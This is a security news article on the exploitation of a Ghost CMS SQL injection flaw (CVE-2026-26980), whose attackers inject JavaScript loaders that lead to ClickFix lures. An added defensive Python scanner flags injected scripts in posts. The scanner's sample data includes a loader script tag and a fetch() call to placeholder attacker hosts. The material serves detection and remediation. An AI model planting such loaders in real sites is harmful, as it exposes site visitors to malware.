
CVE-2026-26980 SQL injection flaw in Ghost CMS

May 26, 2026 04:06 · 12 min read


A large-scale campaign is exploiting a critical SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript code that triggers ClickFix attack flows. The campaign was discovered by XLab threat intelligence researchers at Chinese cybersecurity company Qianxin, who confirmed impact on more than 700 domains, including university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs.

According to the researchers, threat actors planted malicious code on the websites of Harvard University, Oxford University, Auburn University, and DuckDuckGo. Compromised sites can be used to steal sensitive data, including admin API keys, which give management access to users, articles, and themes, and can be used to modify article pages.

Impact and Exploitation

CVE-2026-26980 impacts Ghost 3.24.0 through 6.19.0, and allows unauthenticated attackers to read arbitrary data from the website database, including the admin API keys. Although the fix for the issue was released on February 19 in Ghost CMS version 6.19.1, many sites failed to install the security update.

On February 27, SentinelOne published details about CVE-2026-26980 being exploited in attacks and how such incidents can be detected. The researchers observed at least two distinct activity clusters targeting vulnerable Ghost sites, sometimes re-infecting the same domains with different scripts after cleanup, or one cluster removing the other's script to inject its own.

Attack Chain

The attacks that XLab observed begin by exploiting CVE-2026-26980 to steal the admin API keys, and then use the elevated rights to inject malicious JavaScript into articles. The JavaScript code is a lightweight loader that fetches second-stage code from the attacker’s infrastructure, which is essentially a cloaking script that fingerprints visitors to determine whether they qualify as targets.

Visitors who pass the fingerprinting check are served a fake Cloudflare prompt loaded via an iframe on top of the article page, which contains the ClickFix lure. The ClickFix page instructs victims to verify that they are human by pasting a provided command into the Windows command prompt, which drops a payload on their systems.

Mitigation and Prevention

The most important course of action for Ghost CMS website administrators is to upgrade to version 6.19.1 or later and rotate all keys used previously, as they may have been exposed. XLab provided a list of indicators of compromise (IoCs), including injected scripts, so a thorough review of the websites is needed to locate and remove them.

The researchers recommend that website owners maintain a 30-day record of admin API call logs to enable a reliable retrospective investigation. By taking these steps, website administrators can help prevent and mitigate the impact of CVE-2026-26980 exploitation.
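To make the review steps above concrete, here is an added Python example (not code from the article, XLab, SentinelOne or the Ghost project) with two helpers: one that checks whether a reported Ghost version falls inside the affected range the article gives (3.24.0 through 6.19.0, fixed in 6.19.1), and one that walks post HTML and flags script and iframe elements that point at hosts outside an operator-maintained allowlist or carry inline code, which is how the article says the loader is planted. The post HTML, host names and allowlist are constructed placeholders; how you pull post HTML from your own Ghost instance (database export or Admin API) is left to you.

```python
"""Added triage helpers for a Ghost CMS site review after CVE-2026-26980.

Not code from the article, XLab, SentinelOne or the Ghost project.
Sample posts, host names and the allowlist below are constructed placeholders.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Affected range as stated in the article: 3.24.0 through 6.19.0, fixed in 6.19.1.
AFFECTED_FROM = (3, 24, 0)
FIXED_IN = (6, 19, 1)

# Token used for src values without a host (site-relative paths).
SAME_ORIGIN = "same-origin"


def parse_version(version: str) -> tuple:
    """Turn '6.19.0' or 'v6.19' into a comparable 3-tuple (missing parts pad to 0)."""
    parts = [int(p) for p in version.strip().lstrip("v").split(".")[:3]]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_affected_version(version: str) -> bool:
    """True when the Ghost version is inside the range the article reports as affected."""
    return AFFECTED_FROM <= parse_version(version) < FIXED_IN


class _ScriptFrameCollector(HTMLParser):
    """Collect every <script> and <iframe> element, keeping inline script bodies."""

    def __init__(self):
        super().__init__()
        self.found = []          # dicts: tag, src, inline
        self._in_inline_script = False
        self._inline_parts = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):
            return
        src = dict(attrs).get("src")
        self.found.append({"tag": tag, "src": src, "inline": ""})
        if tag == "script" and src is None:
            # HTMLParser delivers <script> bodies through handle_data (CDATA mode).
            self._in_inline_script = True
            self._inline_parts = []

    def handle_data(self, data):
        if self._in_inline_script:
            self._inline_parts.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline_script:
            self._in_inline_script = False
            self.found[-1]["inline"] = "".join(self._inline_parts).strip()


def find_injected_elements(post_html: str, allowed_hosts) -> list:
    """Return findings a reviewer should inspect for one post's HTML.

    Flags: inline scripts, iframes without a src, and any script/iframe whose
    host is not on the allowlist. Site-relative src values map to SAME_ORIGIN,
    so include that token in the allowlist if relative assets are expected.
    """
    collector = _ScriptFrameCollector()
    collector.feed(post_html)
    collector.close()
    findings = []
    for el in collector.found:
        if el["src"] is None:
            reason = "inline script" if el["tag"] == "script" else "iframe without src"
            findings.append({"tag": el["tag"], "reason": reason, "detail": el["inline"][:80]})
            continue
        host = urlparse(el["src"]).hostname or SAME_ORIGIN
        if host not in allowed_hosts:
            findings.append({"tag": el["tag"], "reason": "host not on allowlist", "detail": el["src"]})
    return findings


def review_posts(posts, allowed_hosts) -> dict:
    """posts: iterable of (post_id, html). Returns {post_id: findings} for posts with findings."""
    report = {}
    for post_id, html in posts:
        findings = find_injected_elements(html, allowed_hosts)
        if findings:
            report[post_id] = findings
    return report


# Constructed sample data: one clean post, one carrying an external loader and an inline script.
ALLOWED_HOSTS = {"cdn.example-site.test", SAME_ORIGIN}
SAMPLE_POSTS = [
    ("clean-post", '<p>Hello</p><script src="/assets/site.js"></script>'
                   '<script src="https://cdn.example-site.test/app.js"></script>'),
    ("suspect-post", '<p>Hi</p><script src="https://loader.attacker-placeholder.test/l.js"></script>'
                     '<script>fetch("https://stage2.attacker-placeholder.test/s")</script>'),
]

if __name__ == "__main__":
    print("6.19.0 affected:", is_affected_version("6.19.0"))
    for post_id, findings in review_posts(SAMPLE_POSTS, ALLOWED_HOSTS).items():
        for f in findings:
            print(f"{post_id}: <{f['tag']}> {f['reason']}: {f['detail']}")
```

The allowlist is the important design choice: a site that legitimately loads scripts from a CDN will otherwise produce noise, and an attacker-controlled host will never be on a list the operator maintains, so unknown hosts are the signal to follow up on. Findings are returned as data rather than printed so the same function can feed a ticket, a log line, or a scheduled check that runs after each content change.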

Conclusion

CVE-2026-26980 is a serious vulnerability, and its exploitation in Ghost CMS can have significant consequences for website administrators and users. By understanding the attack chain and taking steps to mitigate and prevent exploitation, website administrators can help protect their sites and users from malicious activity.

It is essential for website administrators to stay informed about the latest vulnerabilities and exploits, and to take proactive steps to secure their sites and protect their users. By doing so, they can help prevent and mitigate the impact of cyber threats and ensure the security and integrity of their online presence.


Source: BleepingComputer
